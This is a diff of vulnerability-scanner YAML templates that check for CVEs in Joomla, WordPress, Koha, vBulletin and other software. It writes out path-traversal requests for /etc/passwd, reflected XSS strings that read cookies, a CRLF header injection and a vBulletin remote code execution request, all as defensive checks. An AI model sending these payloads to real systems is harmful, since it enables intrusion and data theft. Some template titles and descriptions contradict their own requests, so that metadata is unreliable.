- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-1878.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1878
info:
name: Joomla! Component OrgChart 1.0.0 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the OrgChart (com_orgchart) component 1.0.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12317
- https://www.cvedetails.com/cve/CVE-2010-1878
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_orgchart&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-1977.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1977
info:
name: Joomla! Component J!WHMCS Integrator 1.5.0 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the J!WHMCS Integrator (com_jwhmcs) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12083
- https://www.cvedetails.com/cve/CVE-2010-1977
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jwhmcs&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

26
cves/2010/CVE-2010-1982.yaml Normal file
View File

@ -0,0 +1,26 @@
id: CVE-2010-1982
info:
name: Joomla! Component JA Voice 2.0 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the JA Voice (com_javoice) component 2.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12121
- https://www.cvedetails.com/cve/CVE-2010-1982
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_javoice&view=../../../../../../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-2045.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-2045
info:
name: Joomla! Component FDione Form Wizard 1.0.2 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Dione Form Wizard (aka FDione or com_dioneformwizard) component 1.0.2 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12595
- https://www.cvedetails.com/cve/CVE-2010-2045
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_dioneformwizard&controller=../../../../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-2050.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-2050
info:
name: Joomla! Component MS Comment 0.8.0b - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Moron Solutions MS Comment (com_mscomment) component 0.8.0b for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference: |
- https://www.exploit-db.com/exploits/12611
- https://www.cvedetails.com/cve/CVE-2010-2050
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_mscomment&controller=../../../../../../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-2128.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-2128
info:
name: Joomla! Component JE Quotation Form 1.0b1 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the JE Quotation Form (com_jequoteform) component 1.0b1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the view parameter to index.php.
reference: |
- https://www.exploit-db.com/exploits/12607
- https://www.cvedetails.com/cve/CVE-2010-2128
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jequoteform&view=../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-2507.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-2507
info:
name: Joomla! Component Picasa2Gallery 1.2.8 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Picasa2Gallery (com_picasa2gallery) component 1.2.8 and earlier for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
reference: |
- https://www.exploit-db.com/exploits/13981
- https://www.cvedetails.com/cve/CVE-2010-2507
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_picasa2gallery&controller=../../../../../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-2680.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-2680
info:
name: Joomla! Component jesectionfinder - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the JExtensions JE Section/Property Finder (jesectionfinder) component for Joomla! allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the view parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/14064
- https://www.cvedetails.com/cve/CVE-2010-2680
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/propertyfinder/component/jesectionfinder/?view=../../../../../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-2857.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-2857
info:
name: Joomla! Component Music Manager - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Music Manager component for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the cid parameter to album.html.
reference: |
- https://www.exploit-db.com/exploits/14274
- https://www.cvedetails.com/cve/CVE-2010-2857
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/component/music/album.html?cid=../../../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-2918.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-2918
info:
name: Joomla! Component Visites 1.1 - MosConfig_absolute_path Remote File Inclusion
author: daffainfo
severity: high
description: PHP remote file inclusion vulnerability in core/include/myMailer.class.php in the Visites (com_joomla-visites) component 1.1 RC2 for Joomla! allows remote attackers to execute arbitrary PHP code via a URL in the mosConfig_absolute_path parameter.
reference:
- https://www.exploit-db.com/exploits/31708
- https://www.cvedetails.com/cve/CVE-2010-2918
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=../../../../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-3203.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-3203
info:
name: Joomla! Component PicSell 1.0 - Local File Disclosure
author: daffainfo
severity: high
description: Directory traversal vulnerability in the PicSell (com_picsell) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the dflink parameter in a prevsell dwnfree action to index.php.
reference: |
- https://www.exploit-db.com/exploits/14845
- https://www.cvedetails.com/cve/CVE-2010-3203
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_picsell&controller=prevsell&task=dwnfree&dflink=../../../configuration.php"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-4282.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-4282
info:
name: phpShowtime 2.0 - Directory Traversal
author: daffainfo
severity: high
description: Multiple directory traversal vulnerabilities in Pandora FMS before 3.1.1 allow remote attackers to include and execute arbitrary local files via (1) the page parameter to ajax.php or (2) the id parameter to general/pandora_help.php, and allow remote attackers to include and execute, create, modify, or delete arbitrary local files via (3) the layout parameter to operation/agentes/networkmap.php.
reference:
- https://www.exploit-db.com/exploits/15643
- https://www.cvedetails.com/cve/CVE-2010-4282
tags: cve,cve2010,lfi,joomla
requests:
- method: GET
path:
- "{{BaseURL}}/pandora_console/ajax.php?page=../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-4719.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-4719
info:
name: Joomla! Component JRadio - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in JRadio (com_jradio) component before 1.5.1 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/15749
- https://www.cvedetails.com/cve/CVE-2010-4719
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jradio&controller=../../../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-4769.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-4769
info:
name: Joomla! Component Jimtawl 1.0.2 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Jimtawl (com_jimtawl) component 1.0.2 Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the task parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/15585
- https://www.cvedetails.com/cve/CVE-2010-4769
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jimtawl&Itemid=12&task=../../../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-4977.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-4977
info:
name: Joomla! Component Canteen 1.0 - Local File Inclusion
author: daffainfo
severity: high
description: SQL injection vulnerability in menu.php in the Canteen (com_canteen) component 1.0 for Joomla! allows remote attackers to execute arbitrary SQL commands via the mealid parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/34250
- https://www.cvedetails.com/cve/CVE-2010-4977
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_canteen&controller=../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-5028.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-5028
info:
name: Joomla! Component JE Job 1.0 - Local File Inclusion
author: daffainfo
severity: high
description: SQL injection vulnerability in the JExtensions JE Job (com_jejob) component 1.0 for Joomla! allows remote attackers to execute arbitrary SQL commands via the catid parameter in an item action to index.php.
reference:
- https://www.exploit-db.com/exploits/12601
- https://www.cvedetails.com/cve/CVE-2010-5028
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jejob&view=../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-5286.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-5286
info:
name: Joomla! Component Jstore - 'Controller' Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in Jstore (com_jstore) component for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/34837
- https://www.cvedetails.com/cve/CVE-2010-5286
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jstore&controller=./../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2011/CVE-2011-2744.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2011-2744
info:
name: Chyrp 2.x - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in Chyrp 2.1 and earlier allows remote attackers to include and execute arbitrary local files via a ..%2F (encoded dot dot slash) in the action parameter to the default URI.
reference:
- https://www.exploit-db.com/exploits/35945
- https://www.cvedetails.com/cve/CVE-2011-2744
tags: cve,cve2011,lfi,chyrp
requests:
- method: GET
path:
- "{{BaseURL}}/?action=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2012/CVE-2012-0981.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2012-0981
info:
name: phpShowtime 2.0 - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in phpShowtime 2.0 allows remote attackers to list arbitrary directories and image files via a .. (dot dot) in the r parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/18435
- https://www.cvedetails.com/cve/CVE-2012-0981
tags: cve,cve2012,lfi,phpshowtime
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?r=i/../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2012/CVE-2012-0996.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2012-0996
info:
name: 11in1 CMS 1.2.1 - Local File Inclusion (LFI)
author: daffainfo
severity: high
description: Multiple directory traversal vulnerabilities in 11in1 1.2.1 stable 12-31-2011 allow remote attackers to read arbitrary files via a .. (dot dot) in the class parameter to (1) index.php or (2) admin/index.php.
reference:
- https://www.exploit-db.com/exploits/36784
- https://www.cvedetails.com/cve/CVE-2012-0996
tags: cve,cve2012,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?class=../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2012/CVE-2012-1226.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2012-1226
info:
name: Dolibarr ERP/CRM 3.2 Alpha - Multiple Directory Traversal Vulnerabilities
author: daffainfo
severity: high
description: Multiple directory traversal vulnerabilities in Dolibarr CMS 3.2.0 Alpha allow remote attackers to read arbitrary files and possibly execute arbitrary code via a .. (dot dot) in the (1) file parameter to document.php or (2) backtopage parameter in a create action to comm/action/fiche.php.
reference:
- https://www.exploit-db.com/exploits/36873
- https://www.cvedetails.com/cve/CVE-2012-1226
tags: cve,cve2012,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/document.php?modulepart=project&file=../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

5
cves/2013/CVE-2013-7240.yaml
View File

@ -9,6 +9,11 @@ info:
- https://www.exploit-db.com/exploits/38936
- https://nvd.nist.gov/vuln/detail/CVE-2013-7240
tags: cve,cve2013,wordpress,wp-plugin,lfi
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2013-7240
cwe-id: CWE-22
requests:
- method: GET

27
cves/2014/CVE-2014-10037.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2014-10037
info:
name: DomPHP 0.83 - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in DomPHP 0.83 and earlier allows remote attackers to have unspecified impact via a .. (dot dot) in the url parameter to photoalbum/index.php.
reference:
- https://www.exploit-db.com/exploits/30865
- https://www.cvedetails.com/cve/CVE-2014-10037
tags: cve,cve2014,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/photoalbum/index.php?urlancien=&url=../../../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

37
cves/2014/CVE-2014-4539.yaml Normal file
View File

@ -0,0 +1,37 @@
id: CVE-2014-4539
info:
name: Movies <= 0.6 - Unauthenticated Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
reference: |
- https://wpscan.com/vulnerability/d6ea4fe6-c486-415d-8f6d-57ea2f149304
- https://nvd.nist.gov/vuln/detail/CVE-2014-4539
tags: cve,cve2014,wordpress,wp-plugin,xss
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2014-4539
cwe-id: CWE-79
description: "Cross-site scripting (XSS) vulnerability in the Movies plugin 0.6 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the filename parameter to getid3/demos/demo.mimeonly.php."
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/movies/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&"
matchers-condition: and
matchers:
- type: word
words:
- "'><script>alert(document.cookie)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

37
cves/2014/CVE-2014-4550.yaml Normal file
View File

@ -0,0 +1,37 @@
id: CVE-2014-4550
info:
name: Shortcode Ninja <= 1.4 - Unauthenticated Reflected XSS
author: daffainfo
severity: medium
reference: |
- https://wpscan.com/vulnerability/c7c24c7d-5341-43a6-abea-4a50fce9aab0
- https://nvd.nist.gov/vuln/detail/CVE-2014-4550
tags: cve,cve2014,wordpress,wp-plugin,xss
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2014-4550
cwe-id: CWE-79
description: "Cross-site scripting (XSS) vulnerability in preview-shortcode-external.php in the Shortcode Ninja plugin 1.4 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the shortcode parameter."
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/shortcodeninja/preview-shortcode-external.php?shortcode=shortcode%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3e"
matchers-condition: and
matchers:
- type: word
words:
- "'><script>alert(document.domain)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

37
cves/2014/CVE-2014-4558.yaml Normal file
View File

@ -0,0 +1,37 @@
id: CVE-2014-4558
info:
name: WooCommerce Swipe <= 2.7.1 - Unauthenticated Reflected XSS
author: daffainfo
severity: medium
reference: |
- https://wpscan.com/vulnerability/37d7936a-165f-4c37-84a6-7ba5b59a0301
- https://nvd.nist.gov/vuln/detail/CVE-2014-4558
tags: cve,cve2014,wordpress,wp-plugin,xss
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2014-4558
cwe-id: CWE-79
description: "Cross-site scripting (XSS) vulnerability in test-plugin.php in the Swipe Checkout for WooCommerce plugin 2.7.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the api_url parameter."
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/swipehqpaymentgatewaywoocommerce/test-plugin.php?api_url=api_url%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E "
matchers-condition: and
matchers:
- type: word
words:
- "'><script>alert(document.domain)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

37
cves/2014/CVE-2014-4561.yaml Normal file
View File

@ -0,0 +1,37 @@
id: CVE-2014-4561
info:
name: Ultimate Weather Plugin <= 1.0 - Unauthenticated Reflected XSS
author: daffainfo
severity: medium
reference: |
- https://wpscan.com/vulnerability/5c358ef6-8059-4767-8bcb-418a45b2352d
- https://nvd.nist.gov/vuln/detail/CVE-2014-4561
tags: cve,cve2014,wordpress,wp-plugin,xss
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2014-4561
cwe-id: CWE-79
description: "The ultimate-weather plugin 1.0 for WordPress has XSS"
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/ultimateweatherplugin/magpierss/scripts/magpie_debug.php?url=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- '"><script>alert(document.domain)</script>'
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

37
cves/2014/CVE-2014-4592.yaml Normal file
View File

@ -0,0 +1,37 @@
id: CVE-2014-4592
info:
name: WP Planet <= 0.1 - Unauthenticated Reflected XSS
author: daffainfo
severity: medium
reference: |
- https://wpscan.com/vulnerability/3c9a3a97-8157-4976-8148-587d923e1fb3
- https://nvd.nist.gov/vuln/detail/CVE-2014-4592
tags: cve,cve2014,wordpress,wp-plugin,xss
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2014-4592
cwe-id: CWE-79
description: "Cross-site scripting (XSS) vulnerability in rss.class/scripts/magpie_debug.php in the WP-Planet plugin 0.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the url parameter."
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/wpplanet/rss.class/scripts/magpie_debug.php?url=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(document.domain)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

27
cves/2014/CVE-2014-5111.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2014-5111
info:
name: Fonality trixbox - Directory Traversal
author: daffainfo
severity: high
description: Multiple directory traversal vulnerabilities in Fonality trixbox allow remote attackers to read arbitrary files via a .. (dot dot) in the lang parameter to (1) home/index.php, (2) asterisk_info/asterisk_info.php, (3) repo/repo.php, or (4) endpointcfg/endpointcfg.php in maint/modules/.
reference: |
- https://www.exploit-db.com/exploits/39351
- https://www.cvedetails.com/cve/CVE-2014-5111
tags: cve,cve2014,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/maint/modules/endpointcfg/endpointcfg.php?lang=../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2014/CVE-2014-5258.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2014-5258
info:
name: webEdition 6.3.8.0 - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in showTempFile.php in webEdition CMS before 6.3.9.0 Beta allows remote authenticated users to read arbitrary files via a .. (dot dot) in the file parameter.
reference:
- https://www.exploit-db.com/exploits/34761
- https://www.cvedetails.com/cve/CVE-2014-5258
tags: cve,cve2014,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/webEdition/showTempFile.php?file=../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

2
cves/2015/CVE-2015-1000012.yaml
View File

@ -7,13 +7,13 @@ info:
reference:
- https://wpscan.com/vulnerability/24b83ce5-e3b8-4262-b087-a2dfec014985
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1000012
tags: cve,cve2015,wordpress,wp-plugin,lfi
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.50
cve-id: CVE-2015-1000012
cwe-id: CWE-200
description: "Local File Inclusion Vulnerability in mypixs v0.3 wordpress plugin"
tags: cve,cve2015,wordpress,wp-plugin,lfi
requests:
- method: GET

27
cves/2015/CVE-2015-4414.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2015-4414
info:
name: WordPress Plugin SE HTML5 Album Audio Player 1.1.0 - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in download_audio.php in the SE HTML5 Album Audio Player (se-html5-album-audio-player) plugin 1.1.0 and earlier for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.
reference:
- https://www.exploit-db.com/exploits/37274
- https://www.cvedetails.com/cve/CVE-2015-4414
tags: cve,cve2015,wordpress,wp-plugin,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/se-html5-album-audio-player/download_audio.php?file=/wp-content/uploads/../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

32
cves/2015/CVE-2015-4632.yaml Normal file
View File

@ -0,0 +1,32 @@
id: CVE-2015-4632
info:
name: Koha 3.20.1 - Directory Traversal
author: daffainfo
severity: high
description: Multiple directory traversal vulnerabilities in Koha 3.14.x before 3.14.16, 3.16.x before 3.16.12, 3.18.x before 3.18.08, and 3.20.x before 3.20.1 allow remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the template_path parameter to (1) svc/virtualshelves/search or (2) svc/members/search.
reference: |
- https://www.exploit-db.com/exploits/37388
- https://www.cvedetails.com/cve/CVE-2015-4632
tags: cve,cve2015,lfi
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.50
cve-id: CVE-2015-4632
cwe-id: CWE-22
requests:
- method: GET
path:
- "{{BaseURL}}/cgi-bin/koha/svc/virtualshelves/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

24
cves/2016/CVE-2016-4975.yaml Normal file
View File

@ -0,0 +1,24 @@
id: CVE-2016-4975
info:
name: Apache mod_userdir CRLF injection
author: melbadry9,nadino,xElkomy,sullo
severity: low
description: Apache CRLF injection allowing HTTP response splitting attacks on sites using mod_userdir.
tags: crlf,generic,cves,cve2016
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2016-4975
cwe-id: CWE-93
requests:
- method: GET
path:
- "{{BaseURL}}/~user/%0D%0ASet-Cookie:crlfinjection"
matchers:
- type: regex
regex:
- '(?m)^(?:Set-Cookie\s*?:(?:\s*?|.*?;\s*?))(crlfinjection=crlfinjection)(?:\s*?)(?:$|;)'
part: header

9
network/openssh5.3-detect.yaml → cves/2016/CVE-2016-6210.yaml
View File

@ -1,15 +1,20 @@
id: openssh5.3-detect
id: CVE-2016-6210
info:
name: OpenSSH 5.3 Detection
author: iamthefrogy
severity: low
severity: medium
tags: network,openssh
description: OpenSSH 5.3 is vulnerable to username enumeration and DoS vulnerabilities.
reference:
- http://seclists.org/fulldisclosure/2016/Jul/51
- https://security-tracker.debian.org/tracker/CVE-2016-6210
- http://openwall.com/lists/oss-security/2016/08/01/2
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 5.9
cve-id: CVE-2016-6210
cwe-id: CWE-200
network:
- host:

36
cves/2018/CVE-2018-0127.yaml Normal file
View File

@ -0,0 +1,36 @@
id: CVE-2018-0127
info:
name: Cisco RV132W and RV134W Router Information Disclosure
author: jrolf
severity: critical
description: A vulnerability in the web interface of Cisco RV132W ADSL2+ Wireless-N VPN Routers and Cisco RV134W VDSL2 Wireless-AC VPN Routers could allow an unauthenticated, remote attacker to view configuration parameters for an affected device, which could lead to the disclosure of confidential information.
tags: cve,cve2018,cisco,router
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.80
cve-id: CVE-2018-0127
cwe-id: CWE-306
reference:
- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180207-rv13x_2
- http://www.securitytracker.com/id/1040345
- http://www.securityfocus.com/bid/102969
requests:
- method: GET
path:
- "{{BaseURL}}/dumpmdm.cmd"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "Dump"
- "MDM"
- "cisco"
- "admin"
part: body

5
cves/2019/CVE-2019-16759.yaml
View File

@ -1,10 +1,10 @@
id: CVE-2019-16759
info:
name: 0day RCE in vBulletin v5.0.0-v5.5.4 fix bypass
name: RCE in vBulletin v5.0.0-v5.5.4 fix bypass
author: madrobot
severity: critical
reference: https://blog.exploitee.rs/2020/exploiting-vbulletin-a-tale-of-patch-fail/
reference: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/vbulletin-remote-code-execution-cve-2020-7373/
tags: cve,cve2019,vbulletin,rce
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
@ -17,6 +17,7 @@ requests:
- raw:
- |
POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
subWidgets[0][template]=widget_php&subWidgets[0][config][code]=phpinfo();

5
cves/2019/CVE-2019-17538.yaml
View File

@ -1,6 +1,6 @@
id: CVE-2019-17538
info:
